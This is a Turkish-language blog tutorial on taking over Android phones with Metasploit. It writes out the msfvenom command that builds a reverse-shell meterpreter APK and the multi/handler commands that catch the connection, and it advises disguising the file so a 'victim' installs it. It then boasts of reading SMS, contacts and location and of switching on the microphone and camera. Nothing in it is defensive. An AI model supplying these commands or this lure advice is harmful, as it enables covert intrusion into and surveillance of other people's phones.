Header Ads

LocalHost'a Bağlanan Android Cihazlar Hacklenir mi ?

Merhaba Arkadaşlar ;

Bugün sizlere aynı ağda bulunduğunuz bir "Android" cihazı nasıl hackleyeceğinizi anlatacağım. 
Bu olay sadece "LocalHost" gerektirmemekte. DuckDns  ile sabit ip alıp gerekli portları açtıktan sonra Reel Host  üzerinden saldırabilirsiniz.
Öncelikle Gerekli Malzemeler ;
  1. Kali Linux
  2. Postgresql veritabanı
Bu saldırıları kontrol etmek için kullanılan popüler 2 yöntem bulunmakta. Bunlardan bir tanesi "Armitage" diğeri ise "Msfconsole bunları ikiside aynı yere bağlanır aslında fakat birisi Terminal birisi Gui bir yazılımdır.

Msfconsole 

Msfconsole ile saldırı yapmadan önce postgresql veritabanımızı başlatmamız gerekiyor. Bu veritabanı "Kali Linux" ile orjinal olarak bize verilmekte.
Veritabanını Başlatmak için "service postgresql start" yazmamız gerekmekte.
sonra ise cihazımı hacklemek için dosyamızı oluşturalım. Bunun için gerekli olan kod "msfvenom -p android/meterpreter/reverse_tcp LHOST=xxx.xxx.xxx LPORT=444 R>deneme.apk"
sonra dosyamız ev dizinine kayıt oldu .  Özellikler kısmından erişim hakları bölümüne gelerek program gibi kullanmaya izin ver dememiz gerekiyor .
Sonra bu yazılımı genellikle sıkıştırıp veya şeklini değiştirip kurbana yediriyoruz . Saf birisi ise direk böyle atabilirsiniz. 
Sonra komut satırını "msfconsole" yazıyoruz.
"use multi/handler" yazıyoruz ve sonra oluşturduğumuz virüs dosyasını belirtiyoruz.
"set PAYLOAD android/meterpreter/reverse_tcp"
 "set LHOST xxx.xxxx.xxxx.xxx."
"set LPORT 444"
"exploit"
kurbanın dosyayı açmasını bekliyoruz.
Cihazımız hacklendi ."?" yazarak yardım paneli açarak yapabileceğiniz işlemleri görebilmeniz mümkün.

kurbanımızın sms kayıtlarını aldık isteseydik eğer rehberi alabilir , istediğimiz kişiye mesaj atabilir , konumu öğrenir , istediğimiz kodu çalıştırabilir , mikrafonunu açıp dinleme yapabilir hatta telefon kamerasını açıp izleme bile yapabilirdik.
  • Armitage
Armitage ise aynı mantık hatta sadece "msfconsole"  kısmından sonra değişiyor.
"Armitage" yazılarak armitage açılır.

Payload kısmından android dosyaları bulunuz.
Sonra gerekli ayarlamaları yapınız.
Launch yazısına tıkladıktan sonra  telefon başarıyla hacklendi . Fakat ben size her zaman "MsfConsole" tavsiye ederim !




 



CyberGuilty INC. Blogger tarafından desteklenmektedir.